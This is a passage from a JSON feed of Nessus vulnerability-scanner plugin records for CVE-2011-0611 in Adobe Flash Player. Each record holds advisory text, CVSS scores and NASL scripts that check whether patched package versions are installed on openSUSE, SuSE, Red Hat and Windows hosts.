script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"flash-player-10.2.159.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:42", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).", 
"edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_2_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/53722", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53722);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)\");\n script_summary(english:\"Check for the flash-player-4399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-04/msg00066.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"flash-player-10.2.159.1-0.2.1\") ) flag++;\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:08:36", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_4_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/75833", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75833);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)\");\n script_summary(english:\"Check for the flash-player-4399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-04/msg00066.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"flash-player-10.2.159.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:09:05", "description": "An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. 
This\nvulnerability is detailed on the Adobe security page APSB11-07, listed\nin the References section. Specially crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-0611)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.2.159.1.", "edition": 28, "published": "2011-04-19T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2011:0451)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-19T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2011-0451.NASL", "href": "https://www.tenable.com/plugins/nessus/53482", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0451. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53482);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n script_xref(name:\"RHSA\", value:\"2011:0451\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2011:0451)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-07, listed\nin the References section. 
Specially crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-0611)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.2.159.1.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-0611\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb11-07.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb11-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0451\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.2.159.1-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-10.2.159.1-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:14:35", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)", "edition": 23, "published": "2011-12-13T00:00:00", "title": "SuSE 10 Security Update : flash-player (ZYPP Patch Number 7477)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-12-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FLASH-PLAYER-7477.NASL", "href": "https://www.tenable.com/plugins/nessus/57189", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57189);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"SuSE 10 Security Update : flash-player (ZYPP Patch Number 7477)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a 
security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0611.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7477.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif 
(!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"flash-player-10.2.159.1-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:38:20", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)", "edition": 23, "published": "2011-04-19T00:00:00", "title": "SuSE 11.1 Security Update : flash-player (SAT Patch Number 4400)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-19T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/53485", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53485);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"SuSE 11.1 Security Update : flash-player (SAT Patch Number 4400)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode. (CVE-2011-0611)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0611.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4400.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"flash-player-10.2.159.1-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:43:42", "description": "The remote Windows host contains a version of Adobe Flash Player\nearlier than 10.2.159.1. Such versions are reportedly affected by a\nmemory corruption vulnerability. 
\n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.", "edition": 27, "published": "2011-04-18T00:00:00", "title": "Flash Player < 10.2.159.1 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB11-07.NASL", "href": "https://www.tenable.com/plugins/nessus/53472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(53472);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n \n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_xref(name:\"CERT\", value:\"230057\");\n script_xref(name:\"Secunia\", value:\"44119\");\n \n 